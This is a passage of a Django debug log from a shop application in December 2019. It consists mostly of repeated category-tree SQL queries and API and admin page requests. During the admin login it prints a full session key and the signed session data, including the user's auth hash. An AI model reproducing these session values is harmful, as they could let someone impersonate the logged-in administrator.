"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:27:11,954 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:27:11,957 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:27:11,959 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:27:11,961 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:27:11,964 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:27:11,966 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:27:11,969 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:27:11,972 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:27:11,974 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:27:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:27:15,428 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:27:15,435 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:27:15,439 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:27:15,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:27:15,445 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:27:15,447 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:27:15,449 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:27:15,452 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:27:15,454 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:27:15,458 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:27:15,460 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:27:15,462 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:27:15,465 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:27:15,467 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:27:15,471 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:27:15,473 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:27:15,475 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:27:15,478 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:27:15,480 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:27:15,484 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:27:15,486 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:27:15,489 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:27:15,491 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:27:15,493 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:27:15,496 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:27:15,503 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:27:15,507 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:27:15,511 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:27:15,514 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:27:15,517 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:27:15,521 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:27:15,524 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:27:15,527 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:27:15,529 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:27:15,532 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:27:15,536 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:27:15,538 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:27:15,541 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:27:15,543 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:27:15,546 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:27:15,549 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:27:15,552 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:27:15,557 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:27:15,561 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:27:15,566 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:27:15,570 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:27:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:30:38,181 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:30:38,186 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:30:38] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 09:30:48] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-18 09:30:49,220 utils 4252 140031721535232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T09:30:49.211507+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 18, 9, 30, 49, 211507, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-18 09:30:49,223 utils 4252 140031721535232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 09:30:49,252 utils 4252 140031721535232 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 09:30:49,260 utils 4252 140031721535232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T09:30:49.258918+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 9, 30, 49, 258918, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [18/Dec/2019 09:30:49] "GET /admin/ HTTP/1.0" 200 8208 DEBUG 2019-12-18 09:31:09,226 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:31:09,231 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:31:09] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 09:31:39] "GET / HTTP/1.0" 302 0 [18/Dec/2019 09:36:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:37:23,669 utils 4252 140031721535232 